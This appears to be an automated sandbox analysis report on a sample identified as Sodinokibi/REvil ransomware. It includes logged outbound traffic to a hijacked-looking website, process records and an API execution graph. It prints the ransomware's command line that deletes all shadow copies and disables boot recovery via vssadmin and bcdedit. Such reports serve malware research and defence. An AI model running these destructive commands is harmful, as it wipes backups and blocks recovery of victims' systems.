                                                              2024-09-09 10:07:59 UTC876OUTData Raw: 56 4a 05 22 52 2f 03 82 d8 21 a1 04 60 7d 87 f6 f4 92 57 c0 12 dc b1 33 45 22 e4 c1 a3 a3 4d cc 1e 1a f3 e4 f6 0e a4 eb 2b cc 27 41 38 29 7a 8d f2 87 44 af 3e fe b3 6f e9 33 18 4e 13 4f 77 8d 1c 34 fb 81 c0 cd c5 d2 6a 78 e2 b2 95 07 df 3a 79 2c e0 83 d9 0e cd 01 87 4c e8 2c a9 51 07 45 5e 21 f9 fc ad a2 59 58 b8 13 46 24 3d 21 dc dd e1 0a d6 fe 20 b7 2f 09 7b 34 76 0c 7f 33 82 2e 60 af 0b d1 68 37 6d d7 c3 93 c6 c2 c6 c8 1d db 5c 0c 07 42 64 2e 87 20 5d a2 1b fa 2a 58 91 c3 d7 a9 74 2c 9b d5 80 65 7c 1f 92 a1 22 72 5a 94 8d 86 f6 ee a2 cf 56 fe d3 62 9a 2b ca af 39 63 99 59 1f 41 f9 30 36 8f 83 d8 1f 94 fd b1 ea 18 1d 8e 21 9d d8 ae 05 0e 89 f5 ce 81 27 4a 2b e4 06 17 c0 87 45 0d 20 82 1a c3 7e 50 a6 bd f4 a7 c3 74 58 a4 37 cb 24 6e 58 a0 68 bc b9 63 23
                                                              Data Ascii: VJ"R/!`}W3E"M+'A8)zD>o3NOw4jx:y,L,QE^!YXF$=! /{4v3.`h7m\Bd. ]*Xt,e|"rZVb+9cYA06!'J+E ~PtX7$nXhc#
                                                              2024-09-09 10:07:59 UTC281INHTTP/1.1 301 Moved Permanently
                                                              Age: 0
                                                              Date: Mon, 09 Sep 2024 10:07:59 GMT
                                                              Location: https://www.almamidwifery.com/content/assets/jlbaveucagau.png
                                                              Server: Squarespace
                                                              Strict-Transport-Security: max-age=0
                                                              X-Contextid: rOMuIVNJ/U1Qg6qLb
                                                              Content-Length: 0
                                                              Connection: close


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              38192.168.2.449777198.185.159.1444437156C:\Users\user\Desktop\myfile.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-09-09 10:08:00 UTC226OUTGET /content/assets/jlbaveucagau.png HTTP/1.1
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Pragma: no-cache
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                                                              Host: www.almamidwifery.com
                                                              2024-09-09 10:08:00 UTC474INHTTP/1.1 404 Not Found
                                                              Age: 0
                                                              Content-Type: text/html;charset=utf-8
                                                              Date: Mon, 09 Sep 2024 10:08:00 GMT
                                                              Etag: W/"f874205c86e2e2d9f4f9b0288f247fda"
                                                              Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                              Server: Squarespace
                                                              Set-Cookie: crumb=Bb/l+1uJErrZNDQ5YjJkNTNmYWQ1MmIwMTQzNzY3NGE2ODAxZDk2;Secure;Path=/
                                                              Strict-Transport-Security: max-age=0
                                                              Vary: Accept-Encoding
                                                              X-Content-Type-Options: nosniff
                                                              X-Contextid: erdXcnZq/387pIfGC
                                                              Connection: close
                                                              Transfer-Encoding: chunked
                                                              2024-09-09 10:08:00 UTC712INData Raw: 38 30 30 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3a 6f 67 3d 22 68 74 74 70 3a 2f 2f 6f 70 65 6e 67 72 61 70 68 70 72 6f 74 6f 63 6f 6c 2e 6f 72 67 2f 73 63 68 65 6d 61 2f 22 20 78 6d 6c 6e 73 3a 66 62 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 32 30 30 38 2f 66 62 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 20 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c
                                                              Data Ascii: 8000<!doctype html><html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml" lang="en-US" > <head> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="viewport" content="initial
                                                              2024-09-09 10:08:00 UTC2372INData Raw: 72 79 22 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 6d 61 20 4d 69 64 77 69 66 65 72 79 22 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 73 69 74 65 22 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 3a 2f 2f 69 6d 61 67 65 73 2e 73 71 75 61 72 65 73 70 61 63 65 2d 63 64 6e 2e 63 6f 6d 2f 63 6f 6e 74 65 6e 74 2f 76 31 2f 35 61 64 36 38 30 38 30 61 39 65 30 32 38 32 32 36 63 31 31 35 35 65 64 2f 31 35 32 36 39 32 33 31 33 38 37 33 35 2d 45 46 38 5a 53 53 4c 44 36 54 53 32 4d 32 34 42 45 48 43 32 2f 41 6c 6d 61 2b 4c 6f 67 6f 74 79
                                                              Data Ascii: ry"/><meta property="og:title" content="Alma Midwifery"/><meta property="og:type" content="website"/><meta property="og:image" content="http://images.squarespace-cdn.com/content/v1/5ad68080a9e028226c1155ed/1526923138735-EF8ZSSLD6TS2M24BEHC2/Alma+Logoty
                                                              2024-09-09 10:08:00 UTC538INData Raw: 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 2f 75 73 65 2e 74 79 70 65 6b 69 74 2e 6e 65 74 2f 69 6b 2f 30 69 35 4d 58 62 53 70 4f 32 66 41 43 69 5f 5f 5f 4a 73 57 72 69 64 45 31 54 30 33 46 32 74 5a 48 64 57 59 31 71 6a 71 69 48 4a 66 65 54 43 49 66 34 65 36 70 55 4a 36 77 52 4d 55 35 51 77 58 46 6d 76 75 6a 41 62 68 35 32 4d 74 77 65 49 6f 5a 51 4d 6b 35 32 4a 6b 46 63 77 55 77 51 39 75 5a 41 62 2d 38 36 77 37 4f 63 42 52 69 41 38 58 70 57 46 52 2d 65 6d 71 69 41 55 54 64 63 53 30 6a 68 4e 6c 4f 66 47 30 6a 41 46 75 2d 57 73 6f 53 68 46 47 5a 41 73 75 64 65 38 30 5a 6b 6f 30 5a 57 62 43 48 4b 6f 79 53 6b 6f 6c 5a 50 33 37 4f 63 75 79 64 65 38 30 4f 57 34 38 5a 41 73 54 2d 63 43 6c 5a 68 42 6e 53 66 6f 44 53 57 6d 79 53 63 6d 44 53 65 42 52 5a
                                                              Data Ascii: javascript" src="//use.typekit.net/ik/0i5MXbSpO2fACi___JsWridE1T03F2tZHdWY1qjqiHJfeTCIf4e6pUJ6wRMU5QwXFmvujAbh52MtweIoZQMk52JkFcwUwQ9uZAb-86w7OcBRiA8XpWFR-emqiAUTdcS0jhNlOfG0jAFu-WsoShFGZAsude80Zko0ZWbCHKoySkolZP37Ocuyde80OW48ZAsT-cClZhBnSfoDSWmyScmDSeBRZ
                                                              2024-09-09 10:08:00 UTC4744INData Raw: 2d 41 6f 31 4f 63 6f 38 69 66 55 61 69 61 53 30 6a 41 55 6c 6a 41 75 54 5a 59 69 54 5a 63 6d 6b 70 50 6f 52 64 68 58 43 69 61 69 61 4f 63 42 44 4f 63 75 38 4f 59 69 61 69 6b 6f 6c 6a 41 55 54 64 4b 75 6b 5a 41 6d 71 2d 41 54 6e 4f 41 69 79 2d 61 4d 30 53 61 42 75 6a 57 34 38 53 61 67 79 6a 68 39 30 6a 68 4e 6c 4f 59 69 61 69 6b 6f 44 53 57 6d 79 53 63 6d 44 53 65 42 52 5a 57 46 52 2d 65 6d 71 69 41 55 54 64 63 53 30 6a 68 4e 6c 4a 36 6c 52 6a 41 55 71 5a 57 4a 6c 5a 65 42 6b 2d 6b 4a 35 6a 41 73 7a 6a 63 39 6c 69 65 6d 74 69 66 75 33 53 63 76 37 66 36 52 6b 72 36 49 62 4d 67 36 49 4a 4d 4a 37 66 62 4b 48 46 73 4d 67 65 4d 62 36 4d 4b 47 34 66 4a 53 75 49 4d 49 6a 67 6b 4d 66 48 36 71 4a 4b 51 39 62 4d 73 36 35 4a 4d 4a 37 66 62 4b 4a 46 73 4d 67 65 67 49
                                                              Data Ascii: -Ao1Oco8ifUaiaS0jAUljAuTZYiTZcmkpPoRdhXCiaiaOcBDOcu8OYiaikoljAUTdKukZAmq-ATnOAiy-aM0SaBujW48Sagyjh90jhNlOYiaikoDSWmyScmDSeBRZWFR-emqiAUTdcS0jhNlJ6lRjAUqZWJlZeBk-kJ5jAszjc9liemtifu3Scv7f6Rkr6IbMg6IJMJ7fbKHFsMgeMb6MKG4fJSuIMIjgkMfH6qJKQ9bMs65JMJ7fbKJFsMgegI


                                                              Click to jump to process

                                                              Click to jump to process

                                                              Click to dive into process behavior distribution

                                                              Click to jump to process

                                                              Target ID:0
                                                              Start time:06:05:55
                                                              Start date:09/09/2024
                                                              Path:C:\Users\user\Desktop\myfile.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\myfile.exe"
                                                              Imagebase:0x270000
                                                              File size:164'864 bytes
                                                              MD5 hash:AACA0B25FA85AB4507D3861697824343
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: Windows_Ransomware_Sodinokibi_a282ba44, Description: Identifies SODINOKIBI/REvil ransomware, Source: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                                                              • Rule: Windows_Ransomware_Sodinokibi_a282ba44, Description: Identifies SODINOKIBI/REvil ransomware, Source: 00000000.00000000.1647049931.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                                                              Reputation:low
                                                              Has exited:false

                                                              Target ID:4
                                                              Start time:06:06:20
                                                              Start date:09/09/2024
                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                              Imagebase:0x240000
                                                              File size:236'544 bytes
                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:5
                                                              Start time:06:06:20
                                                              Start date:09/09/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff7699e0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Reset < >

                                                                Execution Graph

                                                                Execution Coverage:33.9%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:10.8%
                                                                Total number of Nodes:1016
                                                                Total number of Limit Nodes:7
                                                                execution_graph 3519 2736e6 3524 27369d 3519->3524 3521 2736ed 3541 273eef ExitProcess 3521->3541 3525 276a4d 3524->3525 3526 2736a2 SetErrorMode 3525->3526 3542 27489c 3526->3542 3529 2736b3 3547 273eef ExitProcess 3529->3547 3530 2736bd 3548 271ac5 3530->3548 3534 2736ba 3534->3521 3535 2736c6 GetCurrentProcessId 3562 276a52 3535->3562 3536 2736d1 3571 274b7a GetCurrentProcess 3536->3571 3620 274e03 3542->3620 3544 2748ba CreateMutexW 3545 2748da RtlGetLastWin32Error 3544->3545 3546 2736af 3544->3546 3545->3546 3546->3529 3546->3530 3622 271a73 3548->3622 3550 271b17 3550->3535 3550->3536 3551 271ad1 3551->3550 3627 27a4be 3551->3627 3554 271b11 3647 273c6b 3554->3647 3555 271b1c 3633 27568f 3555->3633 3561 273c6b RtlFreeHeap 3561->3550 3749 276aad SystemTimeToFileTime 3562->3749 3565 276a5e 3565->3536 3567 276a67 VirtualAlloc 3570 276a98 3567->3570 3570->3536 3766 27464b GetPEB 3571->3766 3573 274b8e 3574 2736d7 3573->3574 3767 27401a OpenProcessToken 3573->3767 3595 272e25 3574->3595 3579 274bbe 3777 2748ef ReleaseMutex 3579->3777 3584 274be0 3789 27459c 3584->3789 3585 274bd9 ExitProcess 3587 274be5 3588 274bfe GetForegroundWindow 3587->3588 3589 274c45 ShellExecuteExW 3588->3589 3589->3589 3590 274c53 3589->3590 3591 273c6b RtlFreeHeap 3590->3591 3592 274c59 3591->3592 3593 273c6b RtlFreeHeap 3592->3593 3594 274c5f ExitProcess 3593->3594 3594->3574 3804 2743c7 3595->3804 3610 272e50 3885 274668 CreateToolhelp32Snapshot 3610->3885 3611 272e72 3902 272ba0 3611->3902 3619 272e9b 3951 2713b4 3619->3951 3621 274e20 3620->3621 3621->3544 3623 271a87 3622->3623 3624 271a92 3623->3624 3650 273c1e 3623->3650 3624->3551 3626 271aa2 3626->3551 3632 27a4d8 3627->3632 3628 27b0cd 3629 27b108 RtlFreeHeap 3628->3629 3630 271b08 3628->3630 3629->3630 3630->3554 3630->3555 3631 27b1b3 RtlAllocateHeap HeapCreate GetProcessHeap 3631->3632 3632->3628 3632->3630 3632->3631 3634 271b58 3633->3634 3635 2756a2 3633->3635 3643 27b108 3634->3643 3635->3634 3659 271286 3635->3659 3663 27119f 3635->3663 3668 271320 3635->3668 3673 2711f0 3635->3673 3678 271222 3635->3678 3683 2710c4 3635->3683 3690 271254 3635->3690 3644 27b113 3643->3644 3645 271b64 3643->3645 3644->3645 3646 273c6b RtlFreeHeap 3644->3646 3645->3561 3646->3644 3748 273c08 RtlFreeHeap 3647->3748 3649 273c7c 3649->3550 3651 273c2a HeapCreate 3650->3651 3652 273c4d 3650->3652 3651->3652 3653 273c42 GetProcessHeap 3651->3653 3656 273bc0 3652->3656 3653->3652 3655 273c67 3655->3626 3657 273bcd RtlAllocateHeap 3656->3657 3658 273bc9 3656->3658 3657->3655 3658->3655 3660 2712a5 3659->3660 3661 27568f 10 API calls 3660->3661 3662 271318 3661->3662 3662->3635 3695 2754aa 3663->3695 3666 2711ca 3666->3635 3669 2754aa 3 API calls 3668->3669 3670 271338 3669->3670 3671 27134b 3670->3671 3672 275654 6 API calls 3670->3672 3671->3635 3672->3671 3674 2754aa 3 API calls 3673->3674 3675 271208 3674->3675 3676 27121b 3675->3676 3677 275654 6 API calls 3675->3677 3676->3635 3677->3676 3679 2754aa 3 API calls 3678->3679 3680 27123a 3679->3680 3681 27124d 3680->3681 3682 275654 6 API calls 3680->3682 3681->3635 3682->3681 3684 274cad 6 API calls 3683->3684 3685 2710d3 3684->3685 3686 2710f3 3685->3686 3740 274cff CryptStringToBinaryW 3685->3740 3686->3635 3689 273c6b RtlFreeHeap 3689->3686 3691 2754aa 3 API calls 3690->3691 3692 27126c 3691->3692 3693 27127f 3692->3693 3694 275654 6 API calls 3692->3694 3693->3635 3694->3693 3706 273bdd HeapCreate 3695->3706 3697 2754b6 3698 273bc0 RtlAllocateHeap 3697->3698 3700 2711b7 3697->3700 3699 2754ef 3698->3699 3699->3700 3707 273bfa HeapDestroy 3699->3707 3700->3666 3702 275654 3700->3702 3703 275684 3702->3703 3704 275663 3702->3704 3703->3666 3704->3703 3708 271000 3704->3708 3706->3697 3707->3700 3709 27100b 3708->3709 3712 27550a 3709->3712 3713 27551b 3712->3713 3714 273bc0 RtlAllocateHeap 3713->3714 3725 271014 3713->3725 3715 275542 3714->3715 3715->3725 3726 275182 3715->3726 3717 275553 3718 275562 3717->3718 3731 274cad MultiByteToWideChar 3717->3731 3719 27558d 3718->3719 3721 273c6b RtlFreeHeap 3718->3721 3718->3725 3722 27559c 3719->3722 3723 273c6b RtlFreeHeap 3719->3723 3721->3719 3739 273c08 RtlFreeHeap 3722->3739 3723->3722 3725->3704 3727 27518f 3726->3727 3728 27518b 3726->3728 3729 273c1e 3 API calls 3727->3729 3728->3717 3730 27519f 3729->3730 3730->3717 3732 274ccc 3731->3732 3733 274cf5 3731->3733 3734 273c1e 3 API calls 3732->3734 3733->3718 3735 274cd5 3734->3735 3735->3733 3736 274cdc MultiByteToWideChar 3735->3736 3736->3733 3737 274cef 3736->3737 3738 273c6b RtlFreeHeap 3737->3738 3738->3733 3739->3725 3741 274d22 3740->3741 3745 2710e8 3740->3745 3742 273c1e 3 API calls 3741->3742 3743 274d2b 3742->3743 3744 274d32 CryptStringToBinaryW 3743->3744 3743->3745 3744->3745 3746 274d50 3744->3746 3745->3689 3747 273c6b RtlFreeHeap 3746->3747 3747->3745 3748->3649 3750 276a5a 3749->3750 3751 276af8 3749->3751 3750->3565 3763 27456a GetNativeSystemInfo 3750->3763 3764 27464b GetPEB 3751->3764 3753 276afd 3754 276b07 Wow64DisableWow64FsRedirection 3753->3754 3755 276b19 GetSystemDirectoryW 3753->3755 3754->3750 3754->3755 3755->3750 3756 276b2f 3755->3756 3757 276bb5 GetFileAttributesExW 3756->3757 3759 276be2 3756->3759 3757->3756 3758 276bc2 CompareFileTime 3757->3758 3758->3756 3765 27464b GetPEB 3759->3765 3761 276bea 3761->3750 3762 276bf4 Wow64RevertWow64FsRedirection 3761->3762 3762->3750 3763->3567 3764->3753 3765->3761 3766->3573 3768 274037 GetTokenInformation 3767->3768 3769 27405b 3767->3769 3800 273db7 3768->3800 3769->3574 3771 274122 OpenProcessToken 3769->3771 3772 27413e GetTokenInformation 3771->3772 3773 274177 3771->3773 3774 274157 IsValidSid 3772->3774 3775 274166 3772->3775 3773->3574 3773->3579 3774->3775 3776 273db7 FindCloseChangeNotification 3775->3776 3776->3773 3778 273db7 FindCloseChangeNotification 3777->3778 3779 274906 3778->3779 3780 2741f5 3779->3780 3781 273c1e 3 API calls 3780->3781 3782 274204 3781->3782 3783 27420f GetModuleFileNameW 3782->3783 3785 273c6b RtlFreeHeap 3782->3785 3787 273c1e 3 API calls 3782->3787 3788 274238 3782->3788 3783->3782 3784 27423a 3783->3784 3786 273c6b RtlFreeHeap 3784->3786 3784->3788 3785->3782 3786->3788 3787->3782 3788->3584 3788->3585 3803 273dd9 GetCommandLineW CommandLineToArgvW 3789->3803 3791 2745ab 3792 2745bb LocalFree 3791->3792 3794 27462d 3791->3794 3795 2745c6 3791->3795 3792->3794 3793 274624 LocalFree 3793->3794 3794->3587 3795->3793 3796 2745e7 3795->3796 3797 273c1e 3 API calls 3796->3797 3799 2745f0 3797->3799 3798 274619 LocalFree 3798->3794 3799->3798 3801 273dc0 FindCloseChangeNotification 3800->3801 3802 273dc9 3800->3802 3801->3802 3802->3769 3803->3791 3805 274e03 3804->3805 3806 2743e5 GetCurrentProcess 3805->3806 3807 274122 4 API calls 3806->3807 3808 2743fa 3807->3808 3816 272e2c 3808->3816 3962 2742ec 3808->3962 3811 274424 OpenProcessToken 3812 274441 ImpersonateLoggedOnUser 3811->3812 3813 274438 3811->3813 3815 273db7 FindCloseChangeNotification 3812->3815 3814 273db7 FindCloseChangeNotification 3813->3814 3814->3816 3817 274453 3815->3817 3819 27149e 3816->3819 3818 273db7 FindCloseChangeNotification 3817->3818 3818->3816 3820 271a73 3 API calls 3819->3820 3821 2714ad 3820->3821 3822 27a4be 4 API calls 3821->3822 3884 271506 3821->3884 3823 2714f4 3822->3823 3824 271500 3823->3824 3826 27150c 3823->3826 3825 273c6b RtlFreeHeap 3824->3825 3825->3884 3827 27568f 10 API calls 3826->3827 3828 2717f6 3827->3828 3829 27b108 RtlFreeHeap 3828->3829 3830 271807 3829->3830 3831 273c6b RtlFreeHeap 3830->3831 3832 27180d 3831->3832 3832->3884 3965 2721f7 3832->3965 3834 271820 4015 274d60 CryptBinaryToStringW 3834->4015 3839 2718a7 4035 271b80 3839->4035 3845 2718ce 4061 273efd 3845->4061 3847 2751b7 3 API calls 3847->3845 3849 2718eb 4069 274063 3849->4069 3850 2751b7 3 API calls 3850->3849 3853 271908 4080 27417f 3853->4080 3854 2751b7 3 API calls 3854->3853 3857 271925 3858 27449a 8 API calls 3857->3858 3860 271930 3858->3860 3859 2751b7 3 API calls 3859->3857 3861 2751b7 3 API calls 3860->3861 3862 271944 3861->3862 4086 274315 3862->4086 3865 271961 4092 273f3c 3865->4092 3866 2751b7 3 API calls 3866->3865 3869 274d60 6 API calls 3870 27197f 3869->3870 3871 273c6b RtlFreeHeap 3870->3871 3872 27198a 3871->3872 4098 27456a GetNativeSystemInfo 3872->4098 3874 27198f 4099 272081 3874->4099 3880 2719ad 4131 271365 3880->4131 3884->3610 3884->3619 3940 27449a 3884->3940 3886 274689 Process32FirstW 3885->3886 3887 272e5d 3885->3887 3888 2746a3 3886->3888 3892 273e42 3887->3892 3889 2746d0 3888->3889 3891 2746be Process32NextW 3888->3891 3890 273db7 FindCloseChangeNotification 3889->3890 3890->3887 3891->3888 3893 273e64 3892->3893 3894 273e83 GetForegroundWindow 3893->3894 3895 273ecf ShellExecuteExW 3894->3895 3895->3895 3896 272e65 3895->3896 3896->3611 3897 2735fa 3896->3897 4298 2765e2 3897->4298 4471 27610e 3902->4471 3905 272c6c 3905->3619 3914 2739b0 GetDC 3905->3914 3906 2765e2 36 API calls 3907 272c1f 3906->3907 3908 272c32 3907->3908 3909 27667a 39 API calls 3907->3909 3910 272c5e 3908->3910 3912 272c40 3908->3912 3909->3908 4484 27605f 3910->4484 3912->3908 3912->3910 4497 274954 Sleep 3912->4497 3915 2739cc CreateCompatibleDC 3914->3915 3916 272e80 3914->3916 3917 273bb1 ReleaseDC 3915->3917 3918 2739e1 GetDeviceCaps GetDeviceCaps CreateCompatibleBitmap 3915->3918 3916->3619 3936 274ec4 3916->3936 3917->3916 3919 273a15 SelectObject GetDeviceCaps MulDiv CreateFontW 3918->3919 3920 273ba9 DeleteDC 3918->3920 3921 273ba0 DeleteObject 3919->3921 3922 273a59 SelectObject SetBkMode SetTextColor GetStockObject FillRect 3919->3922 3920->3917 3921->3920 3923 273aaf 3922->3923 3924 273b3c DrawTextW 3922->3924 3923->3924 3928 273b36 3923->3928 3930 27470f 9 API calls 3923->3930 3934 27470f 9 API calls 3923->3934 4581 2738ab 3924->4581 3926 273b70 3927 273b97 DeleteObject 3926->3927 4599 2736f6 GetObjectW 3926->4599 3927->3921 3928->3924 3930->3923 3932 273c6b RtlFreeHeap 3933 273b96 3932->3933 3933->3927 3935 273aff SetPixel 3934->3935 3935->3923 3938 274edd 3936->3938 3937 274f0a 3937->3619 3938->3937 4624 2726bd 3938->4624 4664 273cd3 GetUserDefaultUILanguage GetSystemDefaultUILanguage 3940->4664 3943 2744b9 3944 273c1e 3 API calls 3943->3944 3945 2744c4 3944->3945 3946 2744cb GetKeyboardLayoutList 3945->3946 3949 272e46 3945->3949 3947 2744d7 3946->3947 3948 273c6b RtlFreeHeap 3947->3948 3947->3949 3948->3949 3949->3610 3950 273eef ExitProcess 3949->3950 3952 2713e3 3951->3952 3956 2713f3 3952->3956 4666 2753bf 3952->4666 3954 273c6b RtlFreeHeap 3954->3956 3955 271498 3957 27446f GetCurrentProcess 3955->3957 3956->3954 3956->3955 3958 274122 4 API calls 3957->3958 3959 27447b 3958->3959 3960 274483 RevertToSelf 3959->3960 3961 272ea8 3959->3961 3960->3961 3961->3534 3963 274668 4 API calls 3962->3963 3964 27430b OpenProcess 3963->3964 3964->3811 3964->3816 3966 27221b 3965->3966 4148 2747ce RegOpenKeyExW 3966->4148 3969 2722d1 3971 2747ce 8 API calls 3969->3971 3970 2747ce 8 API calls 3970->3969 3972 2722ed 3971->3972 3973 27230f 3972->3973 3974 2747ce 8 API calls 3972->3974 3975 2747ce 8 API calls 3973->3975 3974->3973 3976 272331 3975->3976 3977 272350 3976->3977 3978 2747ce 8 API calls 3976->3978 3979 2747ce 8 API calls 3977->3979 3978->3977 3980 27236f 3979->3980 3981 272392 3980->3981 3982 2747ce 8 API calls 3980->3982 3993 2723d9 3981->3993 4159 275722 3981->4159 3982->3981 3984 272427 4162 275ae5 3984->4162 3986 272446 3987 275ae5 12 API calls 3986->3987 3989 27245e 3987->3989 3988 2725d6 3988->3834 3989->3988 4170 27484c RegCreateKeyExW 3989->4170 3992 2724e2 3995 27484c 3 API calls 3992->3995 3998 2725b0 3993->3998 4001 273c6b RtlFreeHeap 3993->4001 3994 27484c 3 API calls 3994->3992 3996 272501 3995->3996 3997 272524 3996->3997 3999 27484c 3 API calls 3996->3999 4000 27484c 3 API calls 3997->4000 4002 2725be 3998->4002 4004 273c6b RtlFreeHeap 3998->4004 3999->3997 4003 27253f 4000->4003 4001->3998 4006 273c6b RtlFreeHeap 4002->4006 4005 27255e 4003->4005 4008 27484c 3 API calls 4003->4008 4004->4002 4007 27484c 3 API calls 4005->4007 4009 2725c5 4006->4009 4011 27257d 4007->4011 4008->4005 4010 273c6b RtlFreeHeap 4009->4010 4012 2725cb 4010->4012 4011->3993 4014 27484c 3 API calls 4011->4014 4013 274d60 6 API calls 4012->4013 4013->3988 4014->3993 4016 274d8b 4015->4016 4022 271888 4015->4022 4017 273c1e 3 API calls 4016->4017 4018 274d97 4017->4018 4019 274d9e CryptBinaryToStringW 4018->4019 4018->4022 4020 274db4 4019->4020 4019->4022 4021 273c6b RtlFreeHeap 4020->4021 4021->4022 4023 27424e 4022->4023 4024 273c1e 3 API calls 4023->4024 4025 27425c 4024->4025 4026 271895 4025->4026 4210 274962 4025->4210 4026->3839 4030 2751b7 4026->4030 4028 274269 4029 2742cb wsprintfW 4028->4029 4029->4026 4031 2751c4 4030->4031 4032 2751c0 4030->4032 4033 273c1e 3 API calls 4031->4033 4032->3839 4034 2751da 4033->4034 4034->3839 4036 271ba1 4035->4036 4037 2747ce 8 API calls 4036->4037 4038 271bda 4037->4038 4039 271c03 4038->4039 4040 2747ce 8 API calls 4038->4040 4041 271c20 4039->4041 4043 273c6b RtlFreeHeap 4039->4043 4053 271c98 4039->4053 4040->4039 4225 2725e4 4041->4225 4043->4041 4045 2718b2 4054 27438b 4045->4054 4046 271c2a 4046->4045 4047 273c6b RtlFreeHeap 4046->4047 4048 271c58 4046->4048 4050 2725e4 12 API calls 4046->4050 4047->4046 4049 27484c 3 API calls 4048->4049 4051 271c7d 4049->4051 4050->4046 4052 27484c 3 API calls 4051->4052 4051->4053 4052->4053 4233 2755af 4053->4233 4055 273c1e 3 API calls 4054->4055 4056 27439a 4055->4056 4057 2718bc 4056->4057 4058 2743a1 GetUserNameW 4056->4058 4057->3845 4057->3847 4058->4057 4059 2743b7 4058->4059 4060 273c6b RtlFreeHeap 4059->4060 4060->4057 4062 273c1e 3 API calls 4061->4062 4063 273f09 4062->4063 4064 2718d9 4063->4064 4065 273f10 GetComputerNameW 4063->4065 4064->3849 4064->3850 4066 273f26 4065->4066 4067 273f2c 4065->4067 4068 273c6b RtlFreeHeap 4066->4068 4067->4064 4068->4067 4070 27408a 4069->4070 4071 2747ce 8 API calls 4070->4071 4072 2740cb 4071->4072 4073 2740de 4072->4073 4075 2740e7 4072->4075 4079 2718f6 4072->4079 4074 273c6b RtlFreeHeap 4073->4074 4074->4079 4076 273c6b RtlFreeHeap 4075->4076 4075->4079 4077 27410b 4076->4077 4078 2751b7 3 API calls 4077->4078 4078->4079 4079->3853 4079->3854 4081 27419e 4080->4081 4082 2747ce 8 API calls 4081->4082 4083 2741da 4082->4083 4084 271913 4083->4084 4085 273c6b RtlFreeHeap 4083->4085 4084->3857 4084->3859 4085->4084 4087 274334 4086->4087 4088 2747ce 8 API calls 4087->4088 4089 274370 4088->4089 4090 273c6b RtlFreeHeap 4089->4090 4091 27194f 4089->4091 4090->4091 4091->3865 4091->3866 4093 273f51 4092->4093 4094 271970 4093->4094 4095 273f99 GetDriveTypeW 4093->4095 4096 273c1e 3 API calls 4093->4096 4097 273fb5 GetDiskFreeSpaceExW 4093->4097 4094->3869 4095->4093 4096->4093 4097->4093 4098->3874 4260 271cb0 4099->4260 4102 274d60 6 API calls 4103 2720a8 4102->4103 4104 273c6b RtlFreeHeap 4103->4104 4105 2720b0 4104->4105 4109 2719a3 4105->4109 4278 274f0f 4105->4278 4107 272147 4108 273c6b RtlFreeHeap 4107->4108 4108->4109 4110 27216b 4109->4110 4111 272189 4110->4111 4112 274f0f 4 API calls 4111->4112 4113 2721b1 4112->4113 4114 2751b7 3 API calls 4113->4114 4115 2721cc 4114->4115 4116 2755af 6 API calls 4115->4116 4119 2719a8 4115->4119 4117 2721e6 4116->4117 4118 273c6b RtlFreeHeap 4117->4118 4118->4119 4120 271e54 4119->4120 4121 271cb0 21 API calls 4120->4121 4122 271e67 4121->4122 4123 271e8d 4122->4123 4124 274d60 6 API calls 4122->4124 4123->3880 4125 271e7e 4124->4125 4126 273c6b RtlFreeHeap 4125->4126 4127 271e86 4126->4127 4127->4123 4128 274f0f 4 API calls 